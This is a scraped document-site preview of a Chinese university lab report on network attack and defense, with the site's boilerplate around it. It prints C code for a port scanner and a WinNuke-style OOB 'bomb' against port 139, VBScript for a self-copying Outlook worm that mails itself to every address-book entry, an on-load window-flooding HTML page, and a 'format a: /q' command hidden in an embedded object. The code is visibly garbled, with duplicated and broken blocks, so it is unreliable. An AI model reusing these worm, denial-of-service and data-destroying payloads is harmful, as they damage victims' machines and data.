網絡攻擊報告_第1頁
網絡攻擊報告_第2頁
網絡攻擊報告_第3頁
網絡攻擊報告_第4頁
網絡攻擊報告_第5頁
已閱讀5頁,還剩4頁未讀, 繼續(xù)免費閱讀

下載本文檔

版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領

文檔簡介

一.實驗題目網絡攻擊與防御。二.實驗環(huán)境PC機一臺;三.實驗目的掌握有關網絡攻擊與防護的基本原理; 了解常用網絡攻擊軟件:掃描器、木馬、密碼破解器等。四.實驗基本原理利用腳本語言、C語言設計網絡攻擊程序:漏洞掃描器、木馬、郵箱攻擊程序等。通過WIN系統(tǒng),結合日志分析、入侵檢測分析,利用防火墻技術和WIN安全審核工具,加固自己的網絡與計算機系統(tǒng)。了解程序設計思想與基本方法,要求學生在課余查閱圖書資料,根據實驗范例,對實驗內容舉一反三,獨立設計軟件。五.實驗方法概述了解信息收集的原理和掃描器的概念,區(qū)別端口掃描器與漏洞掃描器,它們的應用場合及在攻防系統(tǒng)中的作用。掌握常見的掃描器軟件使用方法,如:SATAN、CIS、SuperScan。要求學生在上機時根據自己使用的掃描器軟件對實驗室網絡系統(tǒng)進行漏洞掃描并分析掃描的參數(shù)與結果,將其分析報告詳細地寫出來,并解釋其原因及解決的措施。對掃描的結果作出正確的分析,根據分析評估網絡系統(tǒng)安全性,必要時關閉危險端口,合理配置計算機系統(tǒng)。根據的實例,通過編程要求學生掌握端口掃描器的設計方法。了解常見的監(jiān)聽軟件使用方法,要求學生在上機時根據自己使用的監(jiān)聽軟件對系統(tǒng)進行被動攻擊所得的參數(shù)與結果進行分析,并按照其分析結果用實驗報告形式詳細地寫出來,要求使用網絡刺客sniffit、snoop軟件。掌握突破TCP/IP過濾/防火墻進入內網的方法,掌握TCPSocket數(shù)據轉發(fā)功能,會使用相關的攻擊軟件,如何連接對方服務器,寫出其步驟。要求學生理解和掌握如何突破防火墻進入對方系統(tǒng)方法,通過實驗報告形式將其論述詳細地寫出來,具體要求:概述,攻擊原理,使用軟件,攻擊效果(注意要遵守國家法律,不要破壞對方資源,僅進入系統(tǒng)即可),攻擊過程流程圖。入侵監(jiān)測技術是防火墻技術合理而有效的補充,要求結合漏洞掃描器的使用,通過端口的監(jiān)測,收集關鍵信息,查看系統(tǒng)日志,分析其信息,檢查系統(tǒng)中是否有違反安全策略的行為和遭到襲擊的跡象。利用網絡防火墻、端口安全設置、日志設置及入侵監(jiān)測策略的技術,最有效地加固計算機系統(tǒng),通過實驗結合上述技術到達最佳效果,要求寫出分析報告、具體設置與安全建議。除本書所介紹的Windows系統(tǒng)漏洞外,要求學生更深入一層地了解其它漏洞形式,它們的危害是什么?請認真總結和歸納其漏洞類型、漏洞危害、漏洞攻擊、漏洞防范。結合拒絕攻擊實例分析,要求學生自學smurf攻擊方法,獨立設計一個具有ICMP響應的網絡阻塞攻擊程序。獨立設計一個簡單的web攻擊系統(tǒng),要求具有欺騙形式和攻擊效果。結合后門攻擊實例,要求學生分析程序設計思想,獨立設計一個具有開啟某端口功能和密碼的后門程序。獨立設計木馬程序,結合SYNflood攻擊實例中如何修改注冊表加載自己的程序的方法和木馬程序實例中隱藏任務欄的方法,要求具有自動加載、隱藏任務欄、能夠控制系統(tǒng)的木馬程序。根據網絡系統(tǒng)安全策略,要求學生結合漏洞掃描器的使用,通過端口的監(jiān)測,收集關鍵信息,查看系統(tǒng)日志,分析其信息,檢查系統(tǒng)中是否有違反安全策略的行為和遭到襲擊的跡象。利用網絡防火墻、端口安全設置、日志設置及入侵監(jiān)測策略的技術,最有效地加固計算機系統(tǒng),同時結合Windows系統(tǒng)設置、Internetexplore安全設置、OutlookExpress的安全優(yōu)化設計等方法。通過實驗結合上述技術到達到網絡體系安全防護的最佳效果,要求寫出分析報告、具體設置與安全建議;實驗主體實驗程序清單,實驗框圖與流程圖,實驗途徑,實驗分析,實驗結果。1.掃描器:#include<winsock2.h>//包含windows套接字函數(shù)#include"stdio.h"#pragmacomment(lib,"ws2_32")//將注釋wsock32放置到lib文件中#include<stdlib.h>#include<windows.h>voidmain(){WSADATAws;//將ws的數(shù)據類型聲明為WSADATASOCKETs;structsockaddr_inaddr;//系統(tǒng)保存套接字地址的結構體intg1,k;longg2;printf("請輸入要監(jiān)測最大的端口號\n");scanf("%d",&k);//下面用connect與端口建立連接,如果可以連接表示端口開啟,否則關閉for(inti=1;i<k;i++)//循環(huán)1到k個端口{g2=WSAStartup(0x0101,&ws);s=socket(PF_INET,SOCK_STREAM,0);//創(chuàng)建套接字,TCP/IP協(xié)議,流Socketaddr.sin_family=PF_INET;//規(guī)定使用IPv4協(xié)議addr.sin_addr.s_addr=inet_addr("10.1.8.**");//指定為IP為10.1.8.**,實驗時可以更改addr.sin_port=htons(i);//端口號if(s==INVALID_SOCKET)break;//如果socket沒有連接上,退出g1=connect(s,(structsockaddr*)&addr,sizeof(addr));//建立連接,判斷端口是否關閉if(g1!=0){printf("2:%i端口關閉\n",i);//指定的端口關閉WSACleanup();}else{printf("10.1.8.**:%i端口開啟\n",i);}//指定的端口開放closesocket(s);//關閉套接字}}2.網絡炸彈:OOB(OutOfBand)是TCP/IP的一種傳輸模式,是早期Win95/NT的漏洞,攻擊者向系統(tǒng)139端口傳送0字節(jié)數(shù)據包時,Win系統(tǒng)自動恢復該數(shù)據碎片,導致系統(tǒng)資源耗盡,使機器出現(xiàn)藍屏,以至死機。常見有:WinNuke、Voob等網絡炸彈。#include<windows.h>#include<winsock.h>#include<stdio.h>#pragmacomment(lib,"wsock32.lib")/*定義攻擊目標計算機的IP地址*/char*IpAddr;intIpPort;//進攻端口135或137或139char*Msg="Youarebombed!";/*在被攻擊者計算機上顯示"Youarebombed!"字符串*/voidBanner(void){/*被段顯示攻擊者信息*/printf("Windows95OOBBomberbyjiaocang");}intmain(intargc,char*argv[]){/*開始定義變量*/structsockaddr_insin;WSADATAwsaData;SOCKETsd;Banner();/*顯示攻擊者信息*/{printf("usage:OOBIpPort135");return1;}

IpAddr=argv[1];IpPort=atoi(argv[2]);/*初始化winsock*/if(WSAStartup(MAKEWORD(2,2),&wsaData)!=0){printf("initsocketerror!");return1;}IpAddr=argv[1];IpPort=atoi(argv[2]);/*初始化winsock*/If(WSAStartup(0x0101,&wsaData)//函數(shù)WSAStartup()初始化WindowsSocketAPI,參數(shù)WAVES指定為winsock版本,參數(shù)wsadata指定為返回WSADATA的數(shù)據類型{printf(“InitTCP/IPstackerror!”);Return1;}}if(wsaData.wVersion!=0x0101){printf("Winsockversionisincorrect");//*版本有錯誤,無法通信*/WSACleanup();//函數(shù)WSACleanup()關閉Socket套接字//return1;}

if((sd=socket(AF_INET,SOCK_STREAM,IPPROTO_IP))==INVALID_SOCKET){printf("Createsocketerror!");return1;}//*連接到被攻擊者的IP地址#//printf("connecteto[:139]");//*發(fā)送攻擊字符*//if(send(sd,Msg,strlen(Msg),MSG_OOB)==SOCKET_ERROR){printf("senddataerror!");closesocket(sd);WSACleanup();return1;}//*關閉連接,釋放資源*//closesocket(sd);//WSACleanup();//*提示printf("Bombcomplete!");return0;}3.木馬:特洛伊木馬(Trojanhorse)是一種隱藏了具有攻擊性的應用程序,與病毒程序不同,它不具備復制能力,其功能具有破壞性質。大部分木馬采用C/S運行模式,當服務端在目標計算機上被運行后,打開一個特定的端口進行監(jiān)聽,當客戶端向服務器發(fā)出連接請求時,服務器端的相應程序會自動運行,來應答客戶機的請求。4.OutLook漏洞:OutLook攻擊程序是由VBScript編寫的,其自我復制的原理基本上是利用程序將本身的腳本內容復制一份到一個臨時文件,然后再在傳播的環(huán)節(jié)將其作為附件發(fā)送出去。我們看看腳本是怎么樣完成這個功能的。Setso=CreateObject("Scripting.FileSystemObject")//是創(chuàng)建一個文件系統(tǒng)對象so.GetFile(WScript.ScriptFullName).Copy("C:\dateiname.vbs")//打開這個腳本文件,WScript.ScriptFullName指明是這個程序本身,是一個完整的路徑文件名。GetFile函數(shù)獲得這個文件,Copy函數(shù)將這個文件復制到c盤根目錄下dateiname.vbs這個文件。通過OutLook傳播的電子郵件病毒都是向地址簿中存儲的電子郵件地址發(fā)送內同相同的腳本附件完成的。SetobjOA=Wscript.CreateObject("Outlook.Application")//創(chuàng)建一個OUTLOOK應用的對象SetobjMapi=objOA.GetNameSpace("MAPI")//取得MAPI名字空間Fori=1toobjMapi.AddressLists.Count//遍歷地址簿SetobjAddList=objMapi.AddressLists(i)Forj=1ToobjAddList.AddressEntries.CountSetobjMail=objOA.CreateItem(0)objMail.Recipients.Add(objAddList.AddressEntries(j))//取得郵件地址,收件人objMail.Subject="你好!"objMail.Body="這次給你的附件是我的新文檔!"objMail.Attachments.Add(“c:\virus.vbs")//把自己作為附件擴散出去objMail.Send//發(fā)送郵件NextNext……….5.網絡炸彈:打開outlookexpress:進入發(fā)信編輯:例:網頁炸彈,該程序保存在htm為后綴的文件中,放在郵件的附件中,當雙擊它時,出現(xiàn)無窮網頁窗口,將系統(tǒng)資源耗盡。<html><head><title>no</title><scriptlanguage=“JavaScript”>使用Java腳本functionopenwindow(){for(i=0;i<3;i++)這里可以控制窗口的個數(shù)window.open('0')}</script></head><bodyonload="openwindow()"></body></html>如果將電子郵件夾帶在word文擋中,激活炸彈方法如下:建立一個新文件->執(zhí)行”插入-對象”->插入”包”對象->確定start.exe/mformata:/q/autotest/uformat:格式化a:磁盤/q:快速格式化u:強制執(zhí)行autotest:自動執(zhí)行txt炸彈(1)建立一個僅有簡單字符的文本文件,任意取文件名,如在記事本建立一個空格文件。(2)打開寫字板文檔,將該文件拖入寫字板文檔中。也可以從寫字板的“插入”—“對象”,彈出”插入對象”的對話框中選擇“從文件創(chuàng)建”—然后在“瀏覽”按鈕選擇要插入的文件。3)調用對象包選中該插入的圖標,單擊右鍵,選擇“對象包對象”--“編輯對象包”。在“對象包”的對話欄中選擇“編輯”--“命令行”可以輸入以下命令。Formata:/q/autotest/ustart.exe/mforma

溫馨提示

  • 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯(lián)系上傳者。文件的所有權益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
  • 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
  • 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現(xiàn)方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
  • 6. 下載文件中如有侵權或不適當內容,請與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。

評論

0/150

提交評論